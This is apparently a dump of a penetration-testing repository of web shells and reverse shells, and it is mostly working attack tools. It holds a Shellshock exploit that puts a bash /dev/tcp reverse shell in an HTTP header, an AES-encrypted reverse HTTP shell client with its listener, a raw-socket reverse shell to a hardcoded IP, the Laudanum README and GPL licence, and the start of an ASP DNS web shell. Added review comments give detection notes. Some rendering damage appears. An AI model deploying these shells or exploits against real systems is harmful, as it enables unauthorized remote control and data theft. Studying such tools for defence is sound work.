├── CVE-2014-6271
└── CVE-2014-6271 cgi-bin reverse shell.py
├── Encrypted Shell
├── server.py
├── shell.exe
└── shell.py
├── RevShell_PoC_v1.py
├── laudanum
├── CREDITS
├── GPL
├── README
├── asp
│ ├── dns.asp
│ ├── file.asp
│ ├── proxy.asp
│ └── shell.asp
├── aspx
│ └── shell.aspx
├── cfm
│ └── shell.cfm
├── jsp
│ ├── cmd.war
│ ├── makewar.sh
│ └── warfiles
│ │ ├── META-INF
│ │ └── MANIFEST.MF
│ │ ├── WEB-INF
│ │ └── web.xml
│ │ └── cmd.jsp
├── php
│ ├── dns.php
│ ├── file.php
│ ├── host.php
│ ├── killnc.php
│ ├── php-reverse-shell.php
│ ├── proxy.php
│ └── shell.php
└── wordpress
│ ├── laudanum.php
│ └── templates
│ ├── dns.php
│ ├── file.php
│ ├── host.php
│ ├── ipcheck.php
│ ├── killnc.php
│ ├── php-reverse-shell.php
│ ├── proxy.php
│ ├── settings.php
│ └── shell.php
├── perl-reverse-shell-1.0
├── CHANGELOG
├── COPYING.GPL
├── COPYING.PERL-REVERSE-SHELL
└── perl-reverse-shell.pl
├── php-findsock-shell-1.0
├── CHANGELOG
├── COPYING.GPL
├── COPYING.PHP-FINDSOCK-SHELL
├── findsock.c
└── php-findsock-shell.php
├── php-reverse-shell-1.0
├── CHANGELOG
├── COPYING.GPL
├── COPYING.PHP-REVERSE-SHELL
└── php-reverse-shell.php
└── simple_py_shell.py
/CVE-2014-6271/CVE-2014-6271 cgi-bin reverse shell.py:
--------------------------------------------------------------------------------
#
# CVE-2014-6271 cgi-bin reverse shell
#
# Review notes (defender's view):
#  - Python 2 script (print statements, httplib): one GET to a CGI path carrying a
#    request header whose value begins with a bash function definition "() { ...};"
#    followed by a command. It relies on the CGI host passing request headers to an
#    unpatched bash through the environment, which is the CVE-2014-6271 condition.
#  - Mitigation is the vendor bash update for CVE-2014-6271. Detection: request
#    headers to CGI endpoints that start with "() {", and a web-server process
#    opening an outbound interactive bash connection.
#

import httplib,urllib,sys

if (len(sys.argv)<4):
    # NOTE(review): the argument placeholders after %s appear to have been stripped
    # by the page rendering (probably angle-bracketed names); the Example line
    # below shows the expected order: host, CGI path, listener "ip/port".
    print "Usage: %s " % sys.argv[0]
    print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
    exit(0)

conn = httplib.HTTPConnection(sys.argv[1])
# argv[3] ("host/port") is spliced into a bash /dev/tcp redirect, i.e. the
# connection back is plaintext TCP with an interactive bash on it.
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

# the payload travels in an ordinary custom header named "test"
headers = {"Content-type": "application/x-www-form-urlencoded",
           "test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data
--------------------------------------------------------------------------------
/Encrypted Shell/server.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
############################################
#
#
# AES Encrypted Reverse HTTP Listener by:
#
# Dave Kennedy (ReL1K)
# http://www.secmaniac.com
#
#
############################################
# Copyright 2012 TrustedSec, LLC. All rights reserved.
#
# This piece of software code is licensed under the FreeBSD license..
#
# Visit http://www.freebsd.org/copyright/freebsd-license.html for more information.
#
# Review notes (defender's view):
#  - Python 2 (BaseHTTPServer, raw_input, print statements) plus the third-party
#    PyCrypto AES module.
#  - Operator-side listener: each GET hands the connecting client the next command
#    typed at the "shell> " prompt; each POST prints whatever the client sent back.
#  - The AES key below is a fixed string shipped in the source, so anyone holding
#    this file can decrypt captured traffic; the encryption hides nothing from a
#    defender who has the tool. AES.new(secret) is called without a mode argument,
#    which in PyCrypto selects ECB.
#  - Binds every interface on port 80 with no authentication: any host that can
#    reach the port can pull the queued command or push text into the console.

from BaseHTTPServer import BaseHTTPRequestHandler
from BaseHTTPServer import HTTPServer
import urlparse
import re
import os
import base64
from Crypto.Cipher import AES

# Padding granularity. AES's block is 16 bytes; 16/24/32 are its *key* sizes.
# Padding to a multiple of 32 still yields a multiple of 16, so encrypt() accepts it.
BLOCK_SIZE = 32
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING

# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
# NOTE: rstrip(PADDING) also removes any genuine trailing '{' characters from the
# plaintext, so decrypted output that ends in braces is truncated here, not in transit.
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)

# 32 character secret key - change this if you want to be unique
# (the same constant is compiled into shell.py / shell.exe; it is public once
# the source is published)
secret = "Fj39@vF4@54&8dE@!)(*^+-pL;'dK3J2"

# create a cipher object from the fixed secret above (no mode given -> PyCrypto default, ECB)
cipher = AES.new(secret)

# url decode for postbacks: turn one %XX escape into its character
def htc(m):
    return chr(int(m.group(1),16))

# url decode: only %XX escapes are handled; '+' is left untouched
def urldecode(url):
    rex=re.compile('%([0-9a-hA-H][0-9a-hA-H])',re.M)
    return rex.sub(htc,url)

class GetHandler(BaseHTTPRequestHandler):

    # handle get request: the reply body is the next operator command, encoded as
    # base64(base64(AES(pad(command)))) -- note the base64 is applied twice
    def do_GET(self):

        # this will be our shell command
        message = raw_input("shell> ")
        # send a 200 OK response
        self.send_response(200)
        # end headers
        self.end_headers()
        # encrypt the message (EncodeAES already base64-encodes the ciphertext)
        message = EncodeAES(cipher, message)
        # base64 it a second time; the client mirrors this with two decodes
        message = base64.b64encode(message)
        # write our command shell param to victim
        self.wfile.write(message)
        # return out
        return

    # handle post request: body is "cmd=<base64(base64(AES(pad(output))))>"; it is
    # decoded and printed with no check on who sent it
    def do_POST(self):

        # send a 200 OK response
        self.send_response(200)
        # # end headers
        self.end_headers()
        # grab the length of the POST data
        length = int(self.headers.getheader('content-length'))
        # read in the length of the POST data
        qs = self.rfile.read(length)
        # url decode
        url=urldecode(qs)
        # remove the parameter cmd
        url=url.replace("cmd=", "")
        # base64 decode (outer layer)
        message = base64.b64decode(url)
        # decrypt the string (DecodeAES strips the inner base64 layer and the '{' padding)
        message = DecodeAES(cipher, message)
        # display the command back decrypted
        print message

if __name__ == '__main__':

    # bind to all interfaces
    server = HTTPServer(('', 80), GetHandler)
    print """############################################
#
#
# AES Encrypted Reverse HTTP Listener by:
#
# Dave Kennedy (ReL1K)
# http://www.secmaniac.com
#
#
############################################"""
    # NOTE(review): this literal seems to have lost a word in the page rendering
    # (likely an angle-bracketed key name); left as printed
    print 'Starting encrypted web shell server, use to stop'
    # simple try block
    try:
        # serve and listen forever
        server.serve_forever()
    # handle keyboard interrupts
    except KeyboardInterrupt:
        print "[!] Exiting the encrypted webserver shell.. hack the gibson."

--------------------------------------------------------------------------------
/Encrypted Shell/shell.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jbarcia/Web-Shells/599cae3d6c134e98d7f7384ba3e88a5114cf4c88/Encrypted Shell/shell.exe
--------------------------------------------------------------------------------
/Encrypted Shell/shell.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
##########################################################################################################################
#
#
# AES Encrypted Reverse HTTP Shell by:
#
# Dave Kennedy (ReL1K)
# http://www.secmaniac.com
#
##########################################################################################################################
#
##########################################################################################################################
#
# To compile, you will need pyCrypto, it's a pain to install if you do it from source, should get the binary modules
# to make it easier. Can download from here:
# http://www.voidspace.org.uk/cgi-bin/voidspace/downman.py?file=pycrypto-2.0.1.win32-py2.5.zip
#
##########################################################################################################################
#
# This shell works on any platform you want to compile it in. OSX, Windows, Linux, etc.
#
##########################################################################################################################
#
##########################################################################################################################
#
# Below is the steps used to compile the binary. py2exe requires a dll to be used in conjunction
# so py2exe was not used. Instead, pyinstaller was used in order to byte compile the binary.
#
##########################################################################################################################
#
# export VERSIONER_PYTHON_PREFER_32_BIT=yes
# python Configure.py
# python Makespec.py --onefile --noconsole shell.py
# python Build.py shell/shell.spec
#
###########################################################################################################################
# Copyright 2012 TrustedSec, LLC. All rights reserved.
#
# This piece of software code is licensed under the FreeBSD license..
#
# Visit http://www.freebsd.org/copyright/freebsd-license.html for more information.
#
# Review notes (defender's view):
#  - Client half of the listener in server.py; Python 2 (urllib2, httplib, print
#    statements) plus PyCrypto, with the same fixed AES key, so captured traffic
#    is decryptable with the published source.
#  - Network indicators visible in this file: plaintext HTTP only; a GET of "/" on
#    the listener in a loop with no sleep (very frequent polling); then a POST to
#    /index.aspx with a fixed User-Agent string and a "cmd=" form body.
#  - Host indicators: every received command runs through subprocess.Popen with
#    shell=True, so a shell spawned by this process is the execution path.
#  - Proxy credentials, if enabled, are plaintext constants in this file.

import urllib
import urllib2
import httplib
import subprocess
import sys
import base64
import os
from Crypto.Cipher import AES


# Padding granularity. AES's block is 16 bytes; 16/24/32 are its key sizes.
# Padding to a multiple of 32 still yields a multiple of 16, so encrypt() accepts it.
BLOCK_SIZE = 32
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING

# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
# NOTE: rstrip(PADDING) also removes genuine trailing '{' characters from the plaintext
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)

# secret key, change this if you want to be unique
# (identical to the constant in server.py; public once the source is published)
secret = "Fj39@vF4@54&8dE@!)(*^+-pL;'dK3J2"

# create a cipher object from the fixed secret above (no mode given -> PyCrypto default, ECB)
cipher = AES.new(secret)

# TURN THIS ON IF YOU WANT PROXY SUPPORT
PROXY_SUPPORT = "OFF"
# THIS WILL BE THE PROXY URL
PROXY_URL = "http://proxyinfo:80"
# USERNAME FOR THE PROXY
USERNAME = "username"
# PASSWORD FOR THE PROXY
PASSWORD = "password"

# here is where we set all of our proxy settings (HTTP basic auth, credentials above)
if PROXY_SUPPORT == "ON":
    auth_handler = urllib2.HTTPBasicAuthHandler()
    auth_handler.add_password(realm='RESTRICTED ACCESS',
                              uri=PROXY_URL, # PROXY SPECIFIED ABOVE
                              user=USERNAME, # USERNAME SPECIFIED ABOVE
                              passwd=PASSWORD) # PASSWORD SPECIFIED ABOVE
    opener = urllib2.build_opener(auth_handler)
    urllib2.install_opener(opener)

try:
    # our reverse listener ip address
    address = sys.argv[1]
    # our reverse listener port address
    port = sys.argv[2]

# except that we didn't pass parameters
except IndexError:
    print " \nAES Encrypted Reverse HTTP Shell by:"
    print " Dave Kennedy (ReL1K)"
    print " http://www.secmaniac.com"
    # NOTE(review): the argument placeholders after "shell.exe" look stripped by the page rendering
    print "Usage: shell.exe "
    sys.exit()

# loop forever -- no delay between iterations, so the GET below repeats as fast as
# the listener answers (the listener blocks on its operator prompt per request)
while 1:

    # open up our request handler
    req = urllib2.Request('http://%s:%s' % (address,port))
    # grab our response which contains what command we want
    message = urllib2.urlopen(req)
    # base64 unencode (outer layer; DecodeAES strips the inner one)
    message = base64.b64decode(message.read())
    # decrypt the communications
    message = DecodeAES(cipher, message)
    # quit out if we receive that command
    if message == "quit" or message == "exit":
        sys.exit()
    # issue the shell command we want
    proc = subprocess.Popen(message, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    # read out the data of stdout
    data = proc.stdout.read() + proc.stderr.read()
    # encrypt the data
    data = EncodeAES(cipher, data)
    # base64 encode the data (second layer, mirrored by the listener)
    data = base64.b64encode(data)
    # urlencode the data from stdout
    # NOTE: urlencode runs on the literal '%s' first, producing 'cmd=%25s'; the
    # following % operator then reads '%25s' as a width-25 format, so the base64
    # text is inserted un-escaped (and space-padded if shorter than 25 chars).
    data = urllib.urlencode({'cmd': '%s'}) % (data)
    # who we want to connect back to with the shell
    h = httplib.HTTPConnection('%s:%s' % (address,port))
    # set our basic headers -- the fixed User-Agent below is a usable signature
    headers = {"User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)","Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
    # actually post the data
    h.request('POST', '/index.aspx', data, headers)

--------------------------------------------------------------------------------
/RevShell_PoC_v1.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Simple Reverse Shell Written by: Dave Kennedy (ReL1K)
# Copyright 2012 TrustedSec, LLC. All rights reserved.
#
# This piece of software code is licensed under the FreeBSD license..
#
# Visit http://www.freebsd.org/copyright/freebsd-license.html for more information.

# Review notes (defender's view):
#  - Python 2 raw-socket client: connects to the hardcoded HOST:PORT below, reads
#    up to 1024 bytes per iteration, runs them through a shell, and writes the
#    combined stdout/stderr back on the same socket.
#  - Port 443 is used as a plain TCP channel with no TLS, so non-TLS traffic on 443
#    from a host to 192.168.225.136 is the network-side indicator; on the host it is
#    this process spawning a shell per received chunk.
import socket
import subprocess

HOST = '192.168.225.136' # The remote host
PORT = 443 # The same port as used by the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
# loop forever (no break, so the close() after the loop is never reached)
while 1:
    # recv command line param
    data = s.recv(1024)
    # execute command line via the shell
    proc = subprocess.Popen(data, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
    # grab output from commandline
    stdout_value = proc.stdout.read() + proc.stderr.read()
    # send back to attacker
    s.send(stdout_value)
# quit out afterwards and kill socket (unreachable; see loop comment)
s.close()




--------------------------------------------------------------------------------
/laudanum/CREDITS:
--------------------------------------------------------------------------------
The Team
========================================================
- Kevin Johnson
- Project Lead

- Tim Medin
- Project Lead

- Justin Searle
- Core Developer

Additional Coding
========================================================
- Robin Wood
- Jason Gillam (Wordpress Plugin)
--------------------------------------------------------------------------------
/laudanum/GPL:
--------------------------------------------------------------------------------
The GNU General Public License (GPL)
Version 2, June 1991

Copyright (C) 1989, 1991 Free Software Foundation, Inc.
59 Temple Place, Suite 330, Boston, MA 02111-1307 USA

Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.

Preamble

The licenses for most software are designed to take away your freedom to share
and change it.
By contrast, the GNU General Public License is intended to 14 | guarantee your freedom to share and change free software--to make sure the 15 | software is free for all its users. This General Public License applies to most 16 | of the Free Software Foundation's software and to any other program whose 17 | authors commit to using it. (Some other Free Software Foundation software is 18 | covered by the GNU Library General Public License instead.) You can apply it to 19 | your programs, too. 20 | 21 | When we speak of free software, we are referring to freedom, not price. Our 22 | General Public Licenses are designed to make sure that you have the freedom to 23 | distribute copies of free software (and charge for this service if you wish), 24 | that you receive source code or can get it if you want it, that you can change 25 | the software or use pieces of it in new free programs; and that you know you can 26 | do these things. 27 | 28 | To protect your rights, we need to make restrictions that forbid anyone to deny 29 | you these rights or to ask you to surrender the rights. These restrictions 30 | translate to certain responsibilities for you if you distribute copies of the 31 | software, or if you modify it. 32 | 33 | For example, if you distribute copies of such a program, whether gratis or for 34 | a fee, you must give the recipients all the rights that you have. You must make 35 | sure that they, too, receive or can get the source code. And you must show them 36 | these terms so they know their rights. 37 | 38 | We protect your rights with two steps: (1) copyright the software, and (2) 39 | offer you this license which gives you legal permission to copy, distribute 40 | and/or modify the software. 41 | 42 | Also, for each author's protection and ours, we want to make certain that 43 | everyone understands that there is no warranty for this free software. 
If the 44 | software is modified by someone else and passed on, we want its recipients to 45 | know that what they have is not the original, so that any problems introduced 46 | by others will not reflect on the original authors' reputations. 47 | 48 | Finally, any free program is threatened constantly by software patents. We wish 49 | to avoid the danger that redistributors of a free program will individually 50 | obtain patent licenses, in effect making the program proprietary. To prevent 51 | this, we have made it clear that any patent must be licensed for everyone's free 52 | use or not licensed at all. 53 | 54 | The precise terms and conditions for copying, distribution and modification 55 | follow. 56 | 57 | TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 58 | 59 | 0. This License applies to any program or other work which contains a notice 60 | placed by the copyright holder saying it may be distributed under the terms of 61 | this General Public License. The "Program", below, refers to any such program or 62 | work, and a "work based on the Program" means either the Program or any 63 | derivative work under copyright law: that is to say, a work containing the 64 | Program or a portion of it, either verbatim or with modifications and/or 65 | translated into another language. (Hereinafter, translation is included without 66 | limitation in the term "modification".) Each licensee is addressed as "you". 67 | 68 | Activities other than copying, distribution and modification are not covered by 69 | this License; they are outside its scope. The act of running the Program is not 70 | restricted, and the output from the Program is covered only if its contents 71 | constitute a work based on the Program (independent of having been made by 72 | running the Program). Whether that is true depends on what the Program does. 73 | 74 | 1. 
You may copy and distribute verbatim copies of the Program's source code as 75 | you receive it, in any medium, provided that you conspicuously and appropriately 76 | publish on each copy an appropriate copyright notice and disclaimer of warranty; 77 | keep intact all the notices that refer to this License and to the absence of any 78 | warranty; and give any other recipients of the Program a copy of this License 79 | along with the Program. 80 | 81 | You may charge a fee for the physical act of transferring a copy, and you may at 82 | your option offer warranty protection in exchange for a fee. 83 | 84 | 2. You may modify your copy or copies of the Program or any portion of it, thus 85 | forming a work based on the Program, and copy and distribute such modifications 86 | or work under the terms of Section 1 above, provided that you also meet all of 87 | these conditions: 88 | 89 | a) You must cause the modified files to carry prominent notices stating that 90 | you changed the files and the date of any change. 91 | 92 | b) You must cause any work that you distribute or publish, that in whole or 93 | in part contains or is derived from the Program or any part thereof, to be 94 | licensed as a whole at no charge to all third parties under the terms of 95 | this License. 96 | 97 | c) If the modified program normally reads commands interactively when run, 98 | you must cause it, when started running for such interactive use in the most 99 | ordinary way, to print or display an announcement including an appropriate 100 | copyright notice and a notice that there is no warranty (or else, saying 101 | that you provide a warranty) and that users may redistribute the program 102 | under these conditions, and telling the user how to view a copy of this 103 | License. (Exception: if the Program itself is interactive but does not 104 | normally print such an announcement, your work based on the Program is not 105 | required to print an announcement.) 
106 | 107 | These requirements apply to the modified work as a whole. If identifiable 108 | sections of that work are not derived from the Program, and can be reasonably 109 | considered independent and separate works in themselves, then this License, and 110 | its terms, do not apply to those sections when you distribute them as separate 111 | works. But when you distribute the same sections as part of a whole which is a 112 | work based on the Program, the distribution of the whole must be on the terms of 113 | this License, whose permissions for other licensees extend to the entire whole, 114 | and thus to each and every part regardless of who wrote it. 115 | 116 | Thus, it is not the intent of this section to claim rights or contest your 117 | rights to work written entirely by you; rather, the intent is to exercise the 118 | right to control the distribution of derivative or collective works based on the 119 | Program. 120 | 121 | In addition, mere aggregation of another work not based on the Program with the 122 | Program (or with a work based on the Program) on a volume of a storage or 123 | distribution medium does not bring the other work under the scope of this 124 | License. 125 | 126 | 3. 
You may copy and distribute the Program (or a work based on it, under 127 | Section 2) in object code or executable form under the terms of Sections 1 and 2 128 | above provided that you also do one of the following: 129 | 130 | a) Accompany it with the complete corresponding machine-readable source 131 | code, which must be distributed under the terms of Sections 1 and 2 above on 132 | a medium customarily used for software interchange; or, 133 | 134 | b) Accompany it with a written offer, valid for at least three years, to 135 | give any third party, for a charge no more than your cost of physically 136 | performing source distribution, a complete machine-readable copy of the 137 | corresponding source code, to be distributed under the terms of Sections 1 138 | and 2 above on a medium customarily used for software interchange; or, 139 | 140 | c) Accompany it with the information you received as to the offer to 141 | distribute corresponding source code. (This alternative is allowed only for 142 | noncommercial distribution and only if you received the program in object 143 | code or executable form with such an offer, in accord with Subsection b 144 | above.) 145 | 146 | The source code for a work means the preferred form of the work for making 147 | modifications to it. For an executable work, complete source code means all 148 | the source code for all modules it contains, plus any associated interface 149 | definition files, plus the scripts used to control compilation and installation 150 | of the executable. However, as a special exception, the source code distributed 151 | need not include anything that is normally distributed (in either source or 152 | binary form) with the major components (compiler, kernel, and so on) of the 153 | operating system on which the executable runs, unless that component itself 154 | accompanies the executable. 
155 | 156 | If distribution of executable or object code is made by offering access to copy 157 | from a designated place, then offering equivalent access to copy the source code 158 | from the same place counts as distribution of the source code, even though third 159 | parties are not compelled to copy the source along with the object code. 160 | 161 | 4. You may not copy, modify, sublicense, or distribute the Program except as 162 | expressly provided under this License. Any attempt otherwise to copy, modify, 163 | sublicense or distribute the Program is void, and will automatically terminate 164 | your rights under this License. However, parties who have received copies, or 165 | rights, from you under this License will not have their licenses terminated so 166 | long as such parties remain in full compliance. 167 | 168 | 5. You are not required to accept this License, since you have not signed it. 169 | However, nothing else grants you permission to modify or distribute the Program 170 | or its derivative works. These actions are prohibited by law if you do not 171 | accept this License. Therefore, by modifying or distributing the Program (or any 172 | work based on the Program), you indicate your acceptance of this License to do 173 | so, and all its terms and conditions for copying, distributing or modifying the 174 | Program or works based on it. 175 | 176 | 6. Each time you redistribute the Program (or any work based on the Program), 177 | the recipient automatically receives a license from the original licensor to 178 | copy, distribute or modify the Program subject to these terms and conditions. 179 | You may not impose any further restrictions on the recipients' exercise of the 180 | rights granted herein. You are not responsible for enforcing compliance by third 181 | parties to this License. 182 | 183 | 7. 
If, as a consequence of a court judgment or allegation of patent infringement 184 | or for any other reason (not limited to patent issues), conditions are imposed 185 | on you (whether by court order, agreement or otherwise) that contradict the 186 | conditions of this License, they do not excuse you from the conditions of this 187 | License. If you cannot distribute so as to satisfy simultaneously your 188 | obligations under this License and any other pertinent obligations, then as a 189 | consequence you may not distribute the Program at all. For example, if a patent 190 | license would not permit royalty-free redistribution of the Program by all those 191 | who receive copies directly or indirectly through you, then the only way you 192 | could satisfy both it and this License would be to refrain entirely from 193 | distribution of the Program. 194 | 195 | If any portion of this section is held invalid or unenforceable under any 196 | particular circumstance, the balance of the section is intended to apply and the 197 | section as a whole is intended to apply in other circumstances. 198 | 199 | It is not the purpose of this section to induce you to infringe any patents or 200 | other property right claims or to contest validity of any such claims; this 201 | section has the sole purpose of protecting the integrity of the free software 202 | distribution system, which is implemented by public license practices. Many 203 | people have made generous contributions to the wide range of software 204 | distributed through that system in reliance on consistent application of that 205 | system; it is up to the author/donor to decide if he or she is willing to 206 | distribute software through any other system and a licensee cannot impose that 207 | choice. 208 | 209 | This section is intended to make thoroughly clear what is believed to be a 210 | consequence of the rest of this License. 211 | 212 | 8. 
If the distribution and/or use of the Program is restricted in certain 213 | countries either by patents or by copyrighted interfaces, the original copyright 214 | holder who places the Program under this License may add an explicit 215 | geographical distribution limitation excluding those countries, so that 216 | distribution is permitted only in or among countries not thus excluded. In such 217 | case, this License incorporates the limitation as if written in the body of 218 | this License. 219 | 220 | 9. The Free Software Foundation may publish revised and/or new versions of the 221 | General Public License from time to time. Such new versions will be similar in 222 | spirit to the present version, but may differ in detail to address new problems 223 | or concerns. 224 | 225 | Each version is given a distinguishing version number. If the Program specifies 226 | a version number of this License which applies to it and "any later version", 227 | you have the option of following the terms and conditions either of that version 228 | or of any later version published by the Free Software Foundation. If the 229 | Program does not specify a version number of this License, you may choose any 230 | version ever published by the Free Software Foundation. 231 | 232 | 10. If you wish to incorporate parts of the Program into other free programs 233 | whose distribution conditions are different, write to the author to ask 234 | for permission. For software which is copyrighted by the Free Software 235 | Foundation, write to the Free Software Foundation; we sometimes make exceptions 236 | for this. Our decision will be guided by the two goals of preserving the free 237 | status of all derivatives of our free software and of promoting the sharing and 238 | reuse of software generally. 239 | 240 | NO WARRANTY 241 | 242 | 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE 243 | PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. 
EXCEPT WHEN OTHERWISE STATED 244 | IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS 245 | IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT 246 | NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A 247 | PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE 248 | PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 249 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 250 | 251 | 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL 252 | ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE 253 | PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, 254 | SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY 255 | TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING 256 | RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF 257 | THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER 258 | PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. 
259 | -------------------------------------------------------------------------------- /laudanum/README: -------------------------------------------------------------------------------- 1 | Laudanum: Injectable Web Exploit Code v0.8 2 | 3 | By Kevin Johnson 4 | and the Laudanum Development Team 5 | 6 | Project Website: http://laudanum.secureideas.net 7 | Sourceforge Site: http://sourceforge.net/projects/laudanum 8 | 9 | SVN : svn co https://laudanum.svn.sourceforge.net/svnroot/laudanum laudanum 10 | 11 | ------------------------------------------------------------------------------- 12 | ** Copyright (C) 2014 Kevin Johnson and the Laudanum Project Team 13 | ** 14 | ** This program is free software; you can redistribute it and/or modify 15 | ** it under the terms of the GNU General Public License as published by 16 | ** the Free Software Foundation; either version 2 of the License, or 17 | ** (at your option) any later version. 18 | ** 19 | ** This program is distributed in the hope that it will be useful, 20 | ** but WITHOUT ANY WARRANTY; without even the implied warranty of 21 | ** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 22 | ** GNU General Public License for more details. 23 | ** 24 | ** You should have received a copy of the GNU General Public License 25 | ** along with this program; if not, write to the Free Software 26 | ** Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. 27 | ------------------------------------------------------------------------------- 28 | 29 | I. ABOUT 30 | _____________________________________ 31 | Laudanum is a collection of injectable files, designed to be used in a pentest 32 | when upload vulnerabilities, administrative interfaces, and SQL injection flaws 33 | are found. These files are written in multiple languages for different 34 | environments. They provide functionality such as shell, DNS query, LDAP 35 | retrieval and others. 
36 | -------------------------------------------------------------------------------- /laudanum/asp/dns.asp: -------------------------------------------------------------------------------- 1 | <% 2 | ' ******************************************************************************* 3 | ' *** 4 | ' *** Laudanum Project 5 | ' *** A Collection of Injectable Files used during a Penetration Test 6 | ' *** 7 | ' *** More information is available at: 8 | ' *** http://laudanum.secureideas.net 9 | ' *** laudanum@secureideas.net 10 | ' *** 11 | ' *** Project Leads: 12 | ' *** Kevin Johnson 14 | ' *** 15 | ' *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | ' *** 17 | ' ******************************************************************************** 18 | ' *** 19 | ' *** This file provides access to DNS on the system. 20 | ' *** Written by Tim Medin 21 | ' *** 22 | ' ******************************************************************************** 23 | ' *** This program is free software; you can redistribute it and/or 24 | ' *** modify it under the terms of the GNU General Public License 25 | ' *** as published by the Free Software Foundation; either version 2 26 | ' *** of the License, or (at your option) any later version. 27 | ' *** 28 | ' *** This program is distributed in the hope that it will be useful, 29 | ' *** but WITHOUT ANY WARRANTY; without even the implied warranty of 30 | ' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 31 | ' *** GNU General Public License for more details. 32 | ' *** 33 | ' *** You can get a copy of the GNU General Public License from this 34 | ' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 35 | ' *** You can also write to the Free Software Foundation, Inc., Temple 36 | ' *** Place - Suite Boston, MA USA. 
37 | ' *** 38 | ' ***************************************************************************** */ 39 | 40 | ' ***************** Config entries below *********************** 41 | 42 | ' IPs are enterable as individual addresses TODO: add CIDR support 43 | Dim allowedIPs 44 | Dim allowed 45 | Dim qtypes 46 | Dim qtype 47 | Dim validtype 48 | Dim query 49 | Dim i 50 | Dim command 51 | 52 | allowedIPs = "192.168.0.1,127.0.0.1" 53 | ' Just in case you added a space in the line above 54 | allowedIPs = replace(allowedIPS," ","") 55 | 'turn it into an array 56 | allowedIPs = split(allowedIPS,",") ' 57 | 58 | ' make sure the ip is allowed
' NOTE(review): REMOTE_ADDR is the TCP peer as IIS sees it. Behind a reverse proxy or
' load balancer that is the proxy's own address, so this list either blocks everyone or
' admits everyone the proxy forwards. Do not "fix" that by reading X-Forwarded-For — any
' client can set it. The match is exact string equality, so addresses must be listed in
' the exact form IIS reports them.
 59 | allowed = 0 60 | for i = lbound(allowedIPs) to ubound(allowedIPs) 61 | if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then 62 | allowed = 1 63 | Exit For 64 | end if 65 | next 66 | ' send a 404 if not the allowed IP
' NOTE(review): the body written below (status text plus the caller's address) differs
' from the server's real 404 page, so the file's presence is confirmable by anyone not on
' the list. Setting the status and calling Response.End without a body is quieter.
 67 | if allowed = 0 then 68 | Response.Status = "404 File Not Found" 69 | Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR")) 70 | Response.End 71 | end if 72 | 73 | %> 74 | 75 | 76 | Laudanum ASP DNS Access 77 | 78 | 79 | 84 | 85 | 86 | 87 |

DNS Query 0.1

